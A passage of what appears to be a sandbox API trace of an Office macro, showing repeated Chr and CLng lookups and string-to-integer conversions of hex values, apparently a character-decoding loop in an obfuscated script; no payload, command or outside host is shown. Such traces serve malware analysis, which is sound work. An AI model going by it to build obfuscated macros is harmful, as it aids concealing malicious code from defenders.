(in: strIn="334221", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.021] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0059.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0059.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=6 | out: lpWideCharStr="&HBC3") returned 6 [0059.021] VarI4FromStr (in: strIn="&HBC3", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.022] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0059.022] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0059.022] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=8 | out: lpWideCharStr="1117086") returned 8 [0059.022] VarI4FromStr (in: strIn="1117086", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.022] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0059.022] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.022] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="&H2647") returned 7 [0059.022] VarI4FromStr (in: strIn="&H2647", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.022] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x1d3a3250000 [0059.023] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0059.023] atoi (_Str="2684") returned 2684 [0059.023] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0059.023] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0059.023] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=6 | out: lpWideCharStr="&HAE0") returned 6 [0059.023] VarI4FromStr (in: strIn="&HAE0", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.023] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0059.023] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.023] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="182448") returned 7 [0059.023] VarI4FromStr (in: strIn="182448", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.023] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0059.023] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0059.023] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=6 | out: lpWideCharStr="&H65D") returned 6 [0059.023] VarI4FromStr (in: strIn="&H65D", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.023] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0059.023] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.023] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="467628") returned 7 [0059.023] VarI4FromStr (in: strIn="467628", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.023] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0059.023] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.024] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="&H1006") returned 7 [0059.024] VarI4FromStr (in: strIn="&H1006", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.024] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0059.024] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.024] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="719928") returned 7 [0059.024] VarI4FromStr (in: strIn="719928", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.024] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0059.024] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.024] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="&H1BD8") returned 7 [0059.024] VarI4FromStr (in: strIn="&H1BD8", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.024] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0059.024] atoi (_Str="6218") returned 6218 [0059.024] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0059.024] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.024] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="&H18BD") returned 7 [0059.024] VarI4FromStr (in: strIn="&H18BD", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.024] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39da0e610, cb=0x960) returned 0x1d39da0e610 [0059.024] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="yyy") returned 0x50e071 [0059.024] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0059.024] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.024] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="214015") returned 7 [0059.024] VarI4FromStr (in: strIn="214015", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.025] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0059.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0059.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=6 | out: lpWideCharStr="&H745") returned 6 [0059.025] VarI4FromStr (in: strIn="&H745", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.025] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0059.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0059.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=6 | out: lpWideCharStr="37976") returned 6 [0059.025] VarI4FromStr (in: strIn="37976", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.025] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0059.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0059.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=6 | out: lpWideCharStr="&H328") returned 6 [0059.025] VarI4FromStr (in: strIn="&H328", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.025] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0059.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0059.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=8 | out: lpWideCharStr="1077902") returned 8 [0059.025] VarI4FromStr (in: strIn="1077902", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.025] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0059.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="&H2362") returned 7 [0059.025] VarI4FromStr (in: strIn="&H2362", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.025] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0059.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="879536") returned 7 [0059.025] VarI4FromStr (in: strIn="879536", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.025] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0059.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="&H1EAD") returned 7 [0059.026] VarI4FromStr (in: strIn="&H1EAD", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.026] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0059.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="130410") returned 7 [0059.026] VarI4FromStr (in: strIn="130410", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.026] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0059.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0059.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=6 | out: lpWideCharStr="&HB52") returned 6 [0059.026] VarI4FromStr (in: strIn="&HB52", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.026] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0059.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="625482") returned 7 [0059.026] VarI4FromStr (in: strIn="625482", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.026] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0059.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="&H18AE") returned 7 [0059.026] VarI4FromStr (in: strIn="&H18AE", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.026] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0059.026] atoi (_Str="4175") returned 4175 [0059.026] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0059.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="&H10BE") returned 7 [0059.027] VarI4FromStr (in: strIn="&H10BE", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.027] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0059.027] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.027] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="617210") returned 7 [0059.027] VarI4FromStr (in: strIn="617210", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.027] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0059.027] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.027] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="&H15EB") returned 7 [0059.027] VarI4FromStr (in: strIn="&H15EB", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.027] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0059.027] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0059.027] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=8 | out: lpWideCharStr="1060008") returned 8 [0059.027] VarI4FromStr (in: strIn="1060008", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.027] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0059.027] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.027] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="&H23B2") returned 7 [0059.027] VarI4FromStr (in: strIn="&H23B2", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.027] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0059.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0059.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=6 | out: lpWideCharStr="22927") returned 6 [0059.028] VarI4FromStr (in: strIn="22927", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.028] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0059.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0059.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=5 | out: lpWideCharStr="&HE3") returned 5 [0059.028] VarI4FromStr (in: strIn="&HE3", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.028] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0059.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0059.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=8 | out: lpWideCharStr="1007930") returned 8 [0059.028] VarI4FromStr (in: strIn="1007930", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.028] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0059.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="&H23CB") returned 7 [0059.028] VarI4FromStr (in: strIn="&H23CB", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.028] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0059.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="786480") returned 7 [0059.028] VarI4FromStr (in: strIn="786480", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.028] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0059.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="&H1A7C") returned 7 [0059.029] VarI4FromStr (in: strIn="&H1A7C", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.029] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0059.029] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.029] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="241486") returned 7 [0059.029] VarI4FromStr (in: strIn="241486", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.029] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0059.029] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.029] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="&H1412") returned 7 [0059.029] VarI4FromStr (in: strIn="&H1412", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.029] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0059.029] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.029] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="410176") returned 7 [0059.029] VarI4FromStr (in: strIn="410176", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.029] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0059.029] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0059.029] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=6 | out: lpWideCharStr="&HDD0") returned 6 [0059.029] VarI4FromStr (in: strIn="&HDD0", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.029] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0059.029] atoi (_Str="2594") returned 2594 [0059.029] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0059.029] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0059.029] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=6 | out: lpWideCharStr="&HA8A") returned 6 [0059.029] VarI4FromStr (in: strIn="&HA8A", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.030] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0059.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, 